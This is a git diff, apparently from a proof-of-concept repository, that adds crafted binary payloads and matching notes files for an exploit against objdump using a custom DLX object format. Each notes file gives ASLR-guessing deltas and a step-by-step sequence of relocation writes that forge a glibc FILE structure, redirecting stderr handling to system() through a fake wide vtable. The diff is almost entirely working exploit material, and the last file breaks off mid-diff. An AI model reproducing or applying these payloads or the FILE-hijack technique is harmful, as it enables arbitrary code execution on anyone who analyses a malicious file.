a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin new file mode 100644 index 0000000..9eb3932 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.notes new file mode 100644 index 0000000..8a29d18 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin new file mode 100644 index 0000000..b534929 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes new file mode 100644 index 0000000..29646cd --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin new file mode 100644 index 0000000..714a463 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes new file mode 100644 index 0000000..2df83df --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin new file mode 100644 index 0000000..0666622 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes new file mode 100644 index 0000000..61582b1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000..795cdee Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes new file mode 100644 index 0000000..b9c2213 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000..47f529f Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..ada2a44 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000..d912cc4 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..2eb01e5 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin new file mode 100644 index 0000000..98a9e31 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes new file mode 100644 index 0000000..75abf9d --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000..08b387c Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..bd5c091 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000..050c5e9 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..739c8e2 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000..05ff644 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes new file mode 100644 index 0000000..ec4714e --- /dev/null +++ 